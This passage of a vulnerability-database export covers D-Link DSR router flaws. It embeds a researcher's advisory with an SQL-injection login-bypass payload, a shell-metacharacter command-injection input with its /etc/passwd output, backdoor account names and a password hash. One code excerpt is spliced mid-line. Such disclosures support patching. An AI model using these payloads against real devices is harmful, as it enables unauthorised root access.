"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2013-5946",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2013-5946",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2013-15237",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201312-320",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-65948",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15237"
},
{
"db": "VULHUB",
"id": "VHN-65948"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005614"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-320"
},
{
"db": "NVD",
"id": "CVE-2013-5946"
}
]
},
"description": {
"_id": null,
"data": "The runShellCmd function in systemCheck.htm in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) \"Ping or Trace an IP Address\" or (2) \"Perform a DNS Lookup\" section. D-Link DSR is a wireless service router product. There is a remote arbitrary command execution vulnerability in the implementation of the D-Link DSR router family. Successful use can allow an attacker to execute arbitrary commands with root privileges. The following products and versions are affected: DSR-150 with firmware version 1.08B29 and earlier; DSR-150N with firmware version 1.05B51 and earlier; DSR-250 and DSR-250N with firmware version 1.08B39 and earlier; DSR-500, DSR-500N, DSR-1000, DSR-1000N with previous firmware versions. #\n# CVEs: \n# CVE-2013-5945 - Authentication Bypass by SQL-Injection\n# CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution\n# \n# Vulnerable Routers: \n# D-Link DSR-150 (Firmware \u003c v1.08B44)\n# D-Link DSR-150N (Firmware \u003c v1.05B64)\n# D-Link DSR-250 and DSR-250N (Firmware \u003c v1.08B44)\n# D-Link DSR-500 and DSR-500N (Firmware \u003c v1.08B77)\n# D-Link DSR-1000 and DSR-1000N (Firmware \u003c v1.08B77)\n#\n# Download URL: \n# http://tsd.dlink.com.tw\n# \n# Arch: \n# mips and armv6l, Linux\n# \n# Author: \n# 0_o -- null_null\n# nu11.nu11 [at] yahoo.com\n#\n# Date: \n# 2013-08-18\n# \n# Purpose: \n# Get a non-persistent root shell on your D-Link DSR. \n# \n# Prerequisites: \n# Network access to the router ports 443 and 23. \n# !!! NO AUTHENTICATION CREDENTIALS REQUIRED !!!\n#\n#\n# A list of identified vulns follows. This list is not exhaustive as I assume\n# more vulns are present that just slipped my attention. \n# The fact that D-Link implemented a backdoor user (for what reason, please??)\n# and just renamed it instead of completely removing it after it was targetted\n# by my previous exploit, as well as the triviality of those vulns I found \n# makes me suggest that more vulns are present that are comparably easy to\n# exploit. \n#\n# Since 2013-12-03, patches are available for:\n# DSR-150: Firmware v1.08B44\n# DSR-150N: Firmware v1.05B64\n# DSR-250 and DSR-250N: Firmware v1.08B44\n# DSR-500 and DSR-500N: Firmware v1.08B77\n# DSR-1000 and DSR-1000N: Firmware v1.08B77\n# via http://tsd.dlink.com.tw\n#\n# And now, have a worthwhile read :-)\n#\n\n\n0. Contents:\n\n\n1. Vulnerability: Authentication Bypass by SQL-Injection \n (CVE-2013-5945)\n2. Exposure: D-Link backdoor user\n4. Vulnerability: Use of weak hash algorithms\n5. Exposure: Passwords are stored as plain text in config files\n6. Vulnerability: Bad permissions on /etc/shadow\n\n\n\n1. Vulnerability: Authentication Bypass by SQL-Injection\n (CVE-2013-5945)\n\n\n* Possible via the global webUI login form. \n\n* File /pfrm2.0/share/lua/5.1/teamf1lualib/login.lua contains:\n\n function login.authenticate(tablename, tableInput)\n local username = tableInput[\"Users.UserName\"]\n local password = tableInput[\"Users.Password\"]\n local cur = db.execute(string.format([[\n SELECT *, ROWID AS _ROWID_ FROM %s\n WHERE %s = \u0027%s\u0027 AND %s = \u0027%s\u0027\n ]], tablename, \"UserName\", username, \"Password\", password))\n local result = false\n local statusCode = \"NONE\"\n if cur then\n local row = cur:fetch({}, \"a\")\n cur:close()\n result = row ~= nil\n if result == false then\n statusCode = \"USER_LOGIN_INVALID_PASSWORD\"\n end\n end\n return result, statusCode\n end\n\n* This function creates an SQL statement of the form:\n\n SELECT * FROM \"Users\" WHERE \"UserName\" = \u0027user\u0027 AND \"Password\" = \u0027pass\u0027;\n\n* Since there is a default admin user account called \"admin\" around, this is \n easily exploitable by providing this to the login form:\n\n username = admin\n password = \u0027 or \u0027a\u0027=\u0027a\n\n* ...resulting in this SQL statement:\n\n SELECT * \n FROM \"Users\" \n WHERE \"UserName\" = \u0027admin\u0027 \n AND \"Password\" = \u0027\u0027 or \u0027a\u0027=\u0027a\u0027;\n\n* Old school SQL injection. Ohh, by the way... \n\n* The same fault can be found in captivePortal.lua \n -- FREE NETWORKS FOR EVERYONE --\n\n\n\n2. \n\n* File /pfrm2.0/var/www/systemCheck.htm contains:\n\n local function runShellCmd(command)\n local pipe = io.popen(command .. \" 2\u003e\u00261\") -- redirect stderr to stdout\n local cmdOutput = pipe:read(\"*a\")\n pipe:close()\n return cmdOutput\n end\n if (ButtonType and ButtonType == \"ping\") then\n [...]\n local cmd_ping = pingprog .. \" \" .. ipToPing .. \" \" .. options1 .. \" \u003e \" .. pingfile\n globalCmdOutput = runShellCmd (cmd_ping) \n statusMessage = \"Pinging \" .. ipToPing\n [...]\n elseif (ButtonType and ButtonType == \"traceroute\") then\n [...]\n local cmd = traceRouteProg .. \" \" .. ipToTraceRoute .. options\n globalCmdOutput = runShellCmd(cmd)\n statusMessage = \"Traceroute To \" .. ipToTraceRoute .. \"...\"\n [...]\n elseif (ButtonType and ButtonType == \"dnslookup\") then\n [...]\n util.appendDebugOut(\"Exec = \" .. os.execute(nsLookupProg .. \" \" .. internetNameToNsLookup .. \" \u003e \" .. nsLookupFile))\n statusMessage = \"DNS Lookup for \" .. Tools like curl are not hindered by these checks. \n \n* All forms allow input like this:\n \n localhost;\u003ccommand\u003e\n \n example: \n \n localhost;cat /etc/passwd\n \n* This user provided value is then directly used as part of the input for the\n call to runShellCmd(c) and thus io.popen(c) in the first form section and \n os.execute(c) in the second form section. \n \n* Output from user provided commands gets displayed on the next page beneath \n the benign command output. \n \n example: \n \n [...]\n \u003ctextarea rows=\"15\" name=\"S1\" cols=\"60\" wrap=\"off\" class=\"txtbox1\"\u003e\n traceroute to localhost (127.0.0.1), 10 hops max, 40 byte packets\n 1 localhost (127.0.0.1) 0.429 ms 0.255 ms 0.224 ms\n root:!:0:0:root:/root:/bin/sh\n gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh\n nobody:x:0:0:nobody:/nonexistent:/bin/false\n ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh\n guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh\n admin:x:0:2:Linux User,,,:/home/admin:/bin/sh\n \u0026lt;/textarea\u0026gt;\n [...]\n \n \n \n3. Exposure: D-Link backdoor user:\n \n \n* This was the contents of my /etc/passwd after I upgraded to 1.08B39_WW:\n\n root:!:0:0:root:/root:/bin/sh\n gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh\n nobody:x:0:0:nobody:/nonexistent:/bin/false\n ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh\n guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh\n admin:x:0:2:Linux User,,,:/home/admin:/bin/sh\n\n* You can see the old D-Link backdoor user name \"ZX4q9Q9JUpwTZuo7\". \n That was the account I hacked before with my previous exploit: \n http://www.exploit-db.com/papers/22930/\n And there is a new backdoor user \"gkJ9232xXyruTRmY\" introduced. \n Instead of removing the backdoor, D-Link just created a new one. \n \n* I verified this by showing the /etc/profile:\n \n # /etc/profile\n LD_LIBRARY_PATH=.:/pfrm2.0/lib:/lib\n PATH=.:/pfrm2.0/bin:$PATH\n CLISH_PATH=/etc/clish\n export PATH LD_LIBRARY_PATH CLISH_PATH\n # redirect all users except root to CLI\n if [ \"$USER\" != \"gkJ9232xXyruTRmY\" ] ; then\n trap \"/bin/login\" SIGINT\n trap \"\" SIGTSTP\n /pfrm2.0/bin/cli\n exit\n fi\n PS1=\u0027DSR-250N\u003e \u0027\n \n \n \n4. Vulnerability: Use of weak hash algorithms:\n\n\n* In the /etc/shadow, salted DES hashes are used to store user passwords. \n Since this hash type supports at most 8 characters, users can log in by just \n typing the first 8 letters of their passwords when using SSH or telnet. \n \n* An effective password length limitation of 8 characters makes brute force \n attacks on user accounts very feasible, even if the user chose a longer \n password. \n\n\n\n5. Exposure: Passwords are stored as plain text in config files:\n\n\n* A lookup into the system config file /tmp/teamf1.cfg.ascii, from which the \n /tmp/system.db is built on boot time, reveals that all user passwords are \n stored in plain text. \n\n Example:\n\n [...] \n Users = {}\n Users[1] = {}\n Users[1][\"Capabilities\"] = \"\"\n Users[1][\"DefaultUser\"] = \"1\"\n Users[1][\"UserId\"] = \"1\"\n Users[1][\"FirstName\"] = \"backdoor\"\n Users[1][\"OID\"] = \"0\"\n Users[1][\"GroupId\"] = \"1\"\n Users[1][\"UserName\"] = \"gkJ9232xXyruTRmY\"\n Users[1][\"Password\"] = \"thisobviouslyisafakepass\"\n Users[1][\"UserTimeOut\"] = \"10\"\n Users[1][\"_ROWID_\"] = \"1\"\n Users[1][\"LastName\"] = \"ssl\"\n [...]\n \n \n \n6. Vulnerability: Bad permissions on /etc/shadow\n\n\n* This file should have 600 permissions set and not 644. It is world readable. \n Pointless, since every process runs as root, no user separation is \n done anyway. \n\n DSR-250N\u003e ls -l -a /etc/shadow\n -rw-r--r-- 1 root root 115 Sep 27 15:07 /etc/shadow\n DSR-250N\u003e ps\n PID USER VSZ STAT COMMAND\n 1 root 2700 S init\n 2 root 0 SW\u003c [kthreadd]\n 3 root 0 SW\u003c [ksoftirqd/0]\n 4 root 0 SW\u003c [events/0]\n 5 root 0 SW\u003c [khelper]\n 8 root 0 SW\u003c [async/mgr]\n 111 root 0 SW\u003c [kblockd/0]\n 120 root 0 SW\u003c [khubd]\n 123 root 0 SW\u003c [kseriod]\n 128 root 0 SW\u003c [kslowd]\n 129 root 0 SW\u003c [kslowd]\n 150 root 0 SW [pdflush]\n 151 root 0 SW [pdflush]\n 152 root 0 SW\u003c [kswapd0]\n 200 root 0 SW\u003c [aio/0]\n 210 root 0 SW\u003c [nfsiod]\n 220 root 0 SW\u003c [crypto/0]\n 230 root 0 SW\u003c [cns3xxx_spi.0]\n 781 root 0 SW\u003c [mtdblockd]\n 860 root 0 SW\u003c [usbhid_resumer]\n 874 root 0 SW\u003c [rpciod/0]\n 903 root 0 SWN [jffs2_gcd_mtd4]\n 909 root 0 SWN [jffs2_gcd_mtd5]\n 918 root 3596 S unionfs -s -o cow,nonempty,allow_other /rw_pfrm2.0=R\n 999 root 1816 S \u003c /pfrm2.0/udev/sbin/udevd --daemon\n 1002 root 2988 S /pfrm2.0/bin/platformd /tmp/system.db\n 1003 root 3120 S /pfrm2.0/bin/evtDsptchd /tmp/system.db\n 1049 root 2704 S /usr/sbin/telnetd -l /bin/login\n 1097 root 4560 S /pfrm2.0/bin/wlanClientArlFlushd\n 1141 root 37000 S /pfrm2.0/bin/sshd\n 1154 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN1 5\n 1255 root 3148 S /pfrm2.0/bin/nimfd /tmp/system.db\n 1259 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN2 5\n 1375 root 3588 S /pfrm2.0/bin/firewalld /tmp/system.db\n 1560 root 0 SW\u003c [key_timehandler]\n 1598 root 7776 S /pfrm2.0/bin/racoon -a 8787 -f /var/racoon_path.conf\n 1600 root 8036 S rvgd /tmp/system.db\n 1612 root 0 SW [cavium]\n 1621 root 8424 S vpnKAd /tmp/system.db\n 1685 root 5372 S /pfrm2.0/sslvpn/bin/firebase -d\n 1702 root 5016 S /pfrm2.0/sslvpn/bin/smm -d\n 1711 root 6052 S /pfrm2.0/sslvpn/bin/httpd\n 1712 root 2700 S /bin/sh /var/sslvpn/var/httpdKeepAlive.sh\n 1771 root 2680 S /pfrm2.0/bin/statusD\n 1933 root 3092 S /pfrm2.0/bin/loggingd /tmp/system.db\n 1960 root 5284 S /pfrm2.0/bin/radEap -d /tmp/system.db\n 1962 root 2988 S /pfrm2.0/bin/rebootd /tmp/system.db\n 2004 root 2988 S /pfrm2.0/bin/crond /tmp/system.db\n 2008 root 3260 S /pfrm2.0/bin/ntpd /tmp/system.db\n 2196 root 3128 S /pfrm2.0/bin/intelAmtd /tmp/system.db\n 2205 root 1904 S /pfrm2.0/bin/fReset\n 2311 root 2704 S /bin/sh /pfrm2.0/bin/release_cache.sh\n 2312 root 2704 S /sbin/getty -L ttyS0 115200 vt100\n 2463 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg30 -lf /va\n 2481 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg50 -lf /va\n 3355 root 1768 S /pfrm2.0/bin/rt2860apd\n 3443 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg40 -lf /va\n 3451 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg20 -lf /va\n 3457 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg1 -lf /var\n 3484 root 7836 S /pfrm2.0/bin/snmpd -p /var/run/snmp.pid\n 3518 root 4424 S /pfrm2.0/bin/openvpn --config /var/openvpn/openvpn.c\n 3630 root 1928 S /pfrm2.0/bin/dnsmasq --dns-forward-max=10000 --addn-\n 5353 root 2704 S -sh\n 7877 root 2568 S sleep 60\n 7953 root 2568 S sleep 60\n 8008 root 2704 R ps\n 16749 root 2704 S -sh\n 25690 root 0 SW\u003c [RtmpCmdQTask]\n 25692 root 0 SW\u003c [RtmpWscTask]\n DSR-250N\u003e\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-5946"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005614"
},
{
"db": "CNVD",
"id": "CNVD-2013-15237"
},
{
"db": "BID",
"id": "64181"
},
{
"db": "VULHUB",
"id": "VHN-65948"
},
{
"db": "PACKETSTORM",
"id": "124319"
}
],
"trust": 2.61
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2013-5946",
"trust": 3.5
},
{
"db": "EXPLOIT-DB",
"id": "30061",
"trust": 1.7
},
{
"db": "BID",
"id": "64181",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005614",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201312-320",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2013-15237",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-65948",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "124319",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15237"
},
{
"db": "VULHUB",
"id": "VHN-65948"
},
{
"db": "BID",
"id": "64181"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005614"
},
{
"db": "PACKETSTORM",
"id": "124319"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-320"
},
{
"db": "NVD",
"id": "CVE-2013-5946"
}
]
},
"id": "VAR-201312-0198",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15237"
},
{
"db": "VULHUB",
"id": "VHN-65948"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"_id": null,
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15237"
}
]
},
"last_update_date": "2024-11-23T22:08:28.248000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Services Routers",
"trust": 0.8,
"url": "http://www.dlink.com/us/en/business-solutions/security/services-routers"
},
{
"title": "\u30eb\u30fc\u30bf\uff0f\u30d5\u30a1\u30a4\u30a2\u30a6\u30a9\u30fc\u30eb",
"trust": 0.8,
"url": "http://www.dlink-jp.com/router-firewall"
},
{
"title": "Downloads",
"trust": 0.8,
"url": "http://tsd.dlink.com.tw/"
},
{
"title": "D-Link DSR Router Remote Any Command Execution Vulnerability Patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/41739"
},
{
"title": "DSR-250N_A1_FW1",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47082"
},
{
"title": "DSR-250_A1_FW1",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47081"
},
{
"title": "DSR-150N_A2_FW1",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47080"
},
{
"title": "DSR-150_A2_FW1",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47079"
},
{
"title": "DSR-150_A1_FW1",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47078"
},
{
"title": "DSR-1000_A1_FW1",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47085"
},
{
"title": "DSR-500N_A1_FW1",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47084"
},
{
"title": "DSR-500_A1_FW1",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47083"
},
{
"title": "DSR-1000N_A1_FW1",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47086"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15237"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005614"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-320"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-78",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-65948"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005614"
},
{
"db": "NVD",
"id": "CVE-2013-5946"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.7,
"url": "http://tsd.dlink.com.tw/temp/pmd/12879/dsr-500_500n_1000_1000n_a1_release_notes_fw_v1.08b77_ww.pdf"
},
{
"trust": 1.7,
"url": "http://tsd.dlink.com.tw/temp/pmd/12960/dsr-150n_a2_release_notes_fw_v1.05b64_ww.pdf"
},
{
"trust": 1.7,
"url": "http://tsd.dlink.com.tw/temp/pmd/12966/dsr-150_a1_a2_release_notes_fw_v1.08b44_ww.pdf"
},
{
"trust": 1.7,
"url": "http://tsd.dlink.com.tw/temp/pmd/13039/dsr-250_250n_a1_a2_release_notes_fw_v1.08b44_ww_ru.pdf"
},
{
"trust": 1.7,
"url": "http://www.exploit-db.com/exploits/30061"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5946"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-5946"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/64181"
},
{
"trust": 0.3,
"url": "http://tsd.dlink.com.tw/"
},
{
"trust": 0.3,
"url": "http://www.dlink.com/"
},
{
"trust": 0.1,
"url": "http://www.exploit-db.com/papers/22930/"
},
{
"trust": 0.1,
"url": "http://tsd.dlink.com.tw"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5946"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5945"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15237"
},
{
"db": "VULHUB",
"id": "VHN-65948"
},
{
"db": "BID",
"id": "64181"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005614"
},
{
"db": "PACKETSTORM",
"id": "124319"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-320"
},
{
"db": "NVD",
"id": "CVE-2013-5946"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-15237",
"ident": null
},
{
"db": "VULHUB",
"id": "VHN-65948",
"ident": null
},
{
"db": "BID",
"id": "64181",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005614",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "124319",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-201312-320",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2013-5946",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2013-12-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-15237",
"ident": null
},
{
"date": "2013-12-19T00:00:00",
"db": "VULHUB",
"id": "VHN-65948",
"ident": null
},
{
"date": "2013-12-03T00:00:00",
"db": "BID",
"id": "64181",
"ident": null
},
{
"date": "2013-12-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005614",
"ident": null
},
{
"date": "2013-12-07T17:10:52",
"db": "PACKETSTORM",
"id": "124319",
"ident": null
},
{
"date": "2013-12-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201312-320",
"ident": null
},
{
"date": "2013-12-19T04:24:51.930000",
"db": "NVD",
"id": "CVE-2013-5946",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2013-12-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-15237",
"ident": null
},
{
"date": "2013-12-19T00:00:00",
"db": "VULHUB",
"id": "VHN-65948",
"ident": null
},
{
"date": "2013-12-03T00:00:00",
"db": "BID",
"id": "64181",
"ident": null
},
{
"date": "2013-12-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005614",
"ident": null
},
{
"date": "2023-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201312-320",
"ident": null
},
{
"date": "2024-11-21T01:58:28.360000",
"db": "NVD",
"id": "CVE-2013-5946",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "124319"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-320"
}
],
"trust": 0.7
},
"title": {
"_id": null,
"data": "plural D-Link Vulnerability to execute arbitrary commands in firmware of router products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005614"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201312-320"
}
],
"trust": 0.6
}
}
var-202012-0333
Vulnerability from variot
An issue was discovered on D-Link DSR-250 3.17 devices. Certain functionality in the Unified Services Router web interface could allow an authenticated attacker to execute arbitrary commands, due to a lack of validation of inputs provided in multipart HTTP POST requests. D-Link DSR-250 The device is vulnerable to input verification, and OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. D-Link DSR-250 is an 8-port Gigabit VPN router with dynamic Web content filtering.
D-Link DSR-250 3.17 has a command injection vulnerability in the Unified Services Router web interface. Attackers can use this vulnerability to execute arbitrary commands
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202012-0333",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dsr-150",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.17"
},
{
"model": "dsr-1000",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.17"
},
{
"model": "dsr-250n",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.17"
},
{
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "*"
},
{
"model": "dsr-500",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.17"
},
{
"model": "dsr-1000ac",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.17"
},
{
"model": "dsr-500ac",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.17"
},
{
"model": "dsr-1000n",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.17"
},
{
"model": "dsr-150n",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.17"
},
{
"model": "dsr-250",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.17"
},
{
"model": "dsr-250n",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-1000",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-500n",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-250",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-500",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-150n",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-500ac",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-1000ac",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-1000n",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-150",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-250",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "3.17"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-72723"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-014722"
},
{
"db": "NVD",
"id": "CVE-2020-25759"
}
]
},
"cve": "CVE-2020-25759",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CVE-2020-25759",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CNVD-2020-72723",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2020-25759",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
